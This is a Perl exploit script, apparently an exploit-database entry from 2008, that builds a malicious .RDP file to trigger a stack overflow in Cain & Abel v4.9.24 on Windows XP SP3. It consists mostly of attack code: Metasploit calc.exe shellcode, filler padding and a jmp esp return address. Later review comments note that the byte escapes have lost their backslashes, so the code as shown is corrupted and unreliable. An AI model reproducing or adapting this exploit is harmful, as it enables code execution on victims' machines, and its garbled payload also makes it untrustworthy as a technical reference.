
# Title : Cain & Abel <= v4.9.24 .RDP Stack Overflow Exploit
# Published : 2008-11-30
# Author : SkD


#!/usr/bin/perl
#
# Cain & Abel <= v4.9.24 .RDP Stack Overflow Exploit
# Exploit by SkD (skdrat@hotmail.com)
# -----------------------------------------------
#
# Nothing much to say about this one. This works on
# an updated Windows XP SP3. On Vista this exploit is way easier;
# the more challenging one was on XP, and here it is.
# Enjoy :). Also remember if you want to put your own shellcode
# there are a few character restrictions and using Alpha2 or
# Alpha Numerical won't work at all.
# To open the .RDP file in Cain & Abel, click the
# "Remote Password Decoder Dialog" icon.
# Credits to Encrypt3d.M!nd.
# {Author has no responsibility over the damage you do with this!}

use strict; use warnings;

# Payload pieces. They are concatenated at the bottom of the file in the
# order $overflow . $eip . $addr . $overflow2 . $shellcode.
#
# NOTE(review): as rendered on this page every byte escape reads "x29"
# rather than "\x29" -- the backslashes look lost in extraction, so as
# written these literals are plain ASCII text, not the bytes the comments
# describe. Confirm against the original before reading the repeat counts
# below as byte sizes.
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x19".
"xc5xd8x59x83xebxfcxe2xf4xe5x2dx9cx59x19xc5x53x1c".
"x25x4exa4x5cx61xc4x37xd2x56xddx53x06x39xc4x33x10".
"x92xf1x53x58xf7xf4x18xc0xb5x41x18x2dx1ex04x12x54".
"x18x07x33xadx22x91xfcx5dx6cx20x53x06x3dxc4x33x3f".
"x92xc9x93xd2x46xd9xd9xb2x92xd9x53x58xf2x4cx84x7d".
"x1dx06xe9x99x7dx4ex98x69x9cx05xa0x55x92x85xd4xd2".
"x69xd9x75xd2x71xcdx33x50x92x45x68x59x19xc5x53x31".
"x25x9axe9xafx79x93x51xa1x9ax05xa3x09x71x35x52x5d".
"x46xadx40xa7x93xcbx8fxa6xfexa6xb9x35x7axebxbdx21".
"x7cxc5xd8x59";
# Four-element value written directly after $eip; its purpose is not
# documented anywhere on the page.
my $addr = "xb5xb5xfdx7f";
# Leading filler that precedes the return address: 8206 repetitions.
my $overflow = "x41" x 8206 ;
# Second filler, placed between $addr and $shellcode: 255 repetitions.
my $overflow2 = "x41" x 255 ;
# Value that lands at the overwritten return slot, per the trailing comment.
my $eip = "xd7x30x9dx7c"; #   FOR WINDOWS XP SP3:  0x7c9d30d7       jmp esp (shell32.dll)

# Write the assembled record to s.rdp in the current working directory.
# NOTE(review): two-argument open with no return-value check -- if the
# open fails, the print below writes to an unopened handle (a warning
# under `use warnings`) and the failure is never reported. The
# conventional form is a three-argument open followed by
# `or die "open s.rdp: $!"`; close is likewise unchecked.
open(my $rdp, "> s.rdp");
print $rdp $overflow.$eip.$addr.$overflow2.$shellcode;
close($rdp);
